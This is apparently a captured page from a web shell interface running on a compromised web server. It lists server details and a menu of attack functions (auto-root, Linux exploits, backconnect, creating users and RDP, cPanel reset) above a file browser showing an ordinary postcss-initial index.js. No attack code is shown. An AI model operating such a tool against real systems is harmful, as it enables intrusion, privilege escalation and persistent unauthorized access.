Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
postcss-initial /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
.vscode
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
~
[ DIR ]
drwxrwxrwx
.editorconfig
173
B
-rw-rw-rw-
CHANGELOG.md
2.22
KB
-rw-rw-rw-
LICENSE
1.08
KB
-rw-rw-rw-
README.md
4.14
KB
-rw-rw-rw-
index.js
1.03
KB
-rw-rw-rw-
package.json
1008
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
var makeFallbackFunction = require('./lib/rules-fabric'); module.exports = function postcssInitial(opts) { opts = opts || {}; opts.reset = opts.reset || 'all'; opts.replace = opts.replace || false; var getFallback = makeFallbackFunction(opts.reset === 'inherited'); var getPropPrevTo = function (prop, decl) { var foundPrev = false; decl.parent.walkDecls(function (child) { if (child.prop === decl.prop && child.value !== decl.value) { foundPrev = true; } }); return foundPrev; }; return { postcssPlugin: 'postcss-initial', Declaration: function (decl) { if (!/\binitial\b/.test(decl.value)) { return; } var fallBackRules = getFallback(decl.prop, decl.value); if (fallBackRules.length === 0) return; fallBackRules.forEach(function (rule) { if ( !getPropPrevTo(decl.prop, decl) ) { decl.cloneBefore(rule); } }); if (opts.replace === true) { decl.remove(); } } }; }; module.exports.postcss = true;
Close